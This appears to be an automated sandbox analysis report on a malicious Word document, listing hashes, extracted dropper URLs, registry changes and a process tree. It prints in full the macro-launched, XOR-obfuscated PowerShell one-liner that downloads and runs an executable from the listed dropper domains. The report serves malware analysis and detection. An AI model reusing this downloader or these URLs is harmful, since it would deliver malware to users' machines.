01798d2ac47e6411220221f2b608f2f5d122efa1439ff0d3c2dcbc5925ae639c

General

Target

01798d2ac47e6411220221f2b608f2f5d122efa1439ff0d3c2dcbc5925ae639c.doc
Size

230KB
MD5

4b760e040b90ee17842dde9a176fb47b
SHA1

67357d6bd4265aed6413e82adfa56ae8d1de6c7f
SHA256

01798d2ac47e6411220221f2b608f2f5d122efa1439ff0d3c2dcbc5925ae639c
SHA512

bf8dba2edcf7616bf86252884e08c489d674611210df7becaba5bac55a8a1f967ac059f19864b435c0917f6f76d313cf3e963da5b1de918b766484ff07e572fe

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://workcompoptions.com/yZ3Z/

exe.dropper

http://www.bonzi.top/9kD3h9R/

exe.dropper

http://www.pccabogados.com.ar/bS2F/

exe.dropper

https://kinoko.pw/UPS-Service-Invoices-June-020N/rgqNI/

exe.dropper

http://elixirperu.com/fmu7p/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

Powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1544	1644	Powershell.exe	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 6 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\01798d2ac47e6411220221f2b608f2f5d122efa1439ff0d3c2dcbc5925ae639c.doc"
1⤵
- Modifies Internet Explorer settings
PID:1644

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell & ( ([sTrInG]$verBOsEPreFeReNce)[1,3]+'x'-joiN'')([STrINg]::join( '',( [cHAr[]](127,30,40, 2 , 102 , 53 , 62 ,44, 118, 52, 57,49,62 , 56 ,47 , 123,21,62 ,47, 117, 12 ,62,57 ,24 , 55 ,50 , 62 ,53, 47 , 96 , 127 ,61, 26,45 ,102 ,124, 51 ,47 ,47 , 43,97 , 116, 116 ,44,52, 41 , 48,56 , 52 , 54, 43 ,52, 43,47 ,50 ,52 , 53,40 ,117 ,56 ,52 , 54,116,34,1 , 104, 1, 116,27 ,51 , 47 , 47, 43, 97 , 116, 116, 44 ,44 , 44,117,57 ,52 , 53 , 33 , 50 , 117 , 47, 52,43,116, 98 ,48,31 ,104 ,51 , 98 ,9,116,27, 51, 47, 47 ,43,97 , 116 , 116, 44, 44, 44, 117 ,43 ,56 ,56 ,58 , 57 ,52 , 60, 58,63 , 52, 40 , 117,56 , 52 , 54 , 117,58, 41 ,116 , 57 , 8,105 ,29 ,116,27,51,47 , 47, 43 , 40, 97 , 116 ,116,48,50,53 ,52 ,48,52, 117,43 ,44 ,116 ,14 ,11, 8 , 118,8 , 62, 41 ,45 , 50,56 , 62, 118,18,53, 45, 52 , 50 , 56 ,62,40 , 118,17 , 46 , 53 , 62,118 ,107 ,105,107,21,116 ,41 , 60 , 42, 21 , 18,116, 27 ,51,47, 47,43 , 97,116,116 ,62, 55, 50,35 ,50, 41 , 43, 62 , 41 , 46, 117 , 56, 52 ,54, 116,61 , 54 , 46, 108 , 43 , 116 ,124, 117,8 , 43 , 55, 50 , 47, 115 , 124 ,27 ,124 ,114 ,96,127 , 18 , 19 , 11 ,123, 102, 123, 124,111 ,108, 105 , 124, 96,127 ,11, 43,26, 102, 127,62 ,53, 45 , 97, 47 ,62, 54 ,43 ,112 , 124, 7 ,124 ,112 , 127,18 ,19, 11 ,112,124, 117 ,62 ,35 ,62 ,124 ,96 ,61 , 52 ,41,62,58,56, 51, 115, 127 ,8, 63 ,8, 123, 50 ,53, 123 , 127 ,61,26,45,114 , 32 , 47 ,41 , 34 ,32 , 127, 30, 40 , 2,117 , 31 , 52 ,44, 53,55 , 52 ,58 ,63, 29 ,50 , 55 ,62,115, 127 ,8 , 63,8,119,123 , 127, 11,43,26 ,114 ,96,8,47 ,58,41 ,47 , 118 , 11, 41 ,52 ,56,62 , 40, 40 , 123 ,127 ,11 ,43, 26 ,96 , 57, 41 ,62,58 , 48, 96, 38 ,56, 58,47,56 , 51 , 32 , 38 ,38 )|%{[cHAr]($_ -bXoR "0x5b" ) })) )
2⤵
- Process spawned unexpected child process
PID:1544

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:968

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/968-119-0x0000000000000000-mapping.dmp

Download
memory/968-120-0x000007FEFC331000-0x000007FEFC333000-memory.dmp

Filesize
8KB

Download
memory/1544-115-0x0000000000000000-mapping.dmp

Download
memory/1544-117-0x000000006B0F0000-0x000000006B69B000-memory.dmp

Filesize
5.7MB

Download
memory/1544-118-0x0000000005010000-0x0000000005101000-memory.dmp

Filesize
964KB

Download
memory/1644-54-0x0000000072E21000-0x0000000072E24000-memory.dmp

Filesize
12KB

Download
memory/1644-55-0x00000000708A1000-0x00000000708A3000-memory.dmp

Filesize
8KB

Download
memory/1644-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1644-57-0x00000000769D1000-0x00000000769D3000-memory.dmp

Filesize
8KB

Download
memory/1644-58-0x000000007188D000-0x0000000071898000-memory.dmp

Filesize
44KB

Download
memory/1644-121-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads